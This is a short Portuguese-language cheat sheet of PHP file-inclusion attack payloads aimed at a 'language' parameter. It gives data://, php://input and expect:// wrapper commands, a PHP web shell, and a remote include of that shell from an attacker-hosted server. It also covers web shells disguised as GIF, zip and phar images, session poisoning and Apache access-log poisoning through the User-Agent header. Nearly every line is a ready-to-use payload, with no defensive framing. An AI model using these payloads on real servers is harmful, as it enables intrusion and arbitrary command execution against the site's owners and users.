Remote Code Execution

/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id

RCE com wrapper de dados

curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id"

RCE com wrapper de entrada

curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"

RCE com wrapper expect

echo '<?php system($_GET["cmd"]); ?>' > shell.php && python3 -m http.server <LISTENING_PORT>

Host web shell

/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id

Incluir shell web PHP remoto

echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif

Criar imagem maliciosa

/index.php?language=./profile_images/shell.gif&cmd=id

RCE com imagem maliciosa carregada

echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php

Crie um arquivo zip malicioso 'como jpg'

/index.php?language=zip://shell.zip%23shell.php&cmd=id

RCE com zip malicioso carregado

php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg

Crie um phar malicioso 'como jpg'

/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id

RCE com phar carregado malicioso

/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd

Ler parâmetros de sessão PHP

/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E

Sessão de envenenamento PHP com shell web

/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id

RCE através de sessão PHP envenenada

curl -s "http://<SERVER_IP>:<PORT>/index.php" -A '<?php system($_GET["cmd"]); ?>'

Log do servidor Poison

/index.php?language=/var/log/apache2/access.log&cmd=id

RCE através de sessão PHP envenenada

Last updated 11 months ago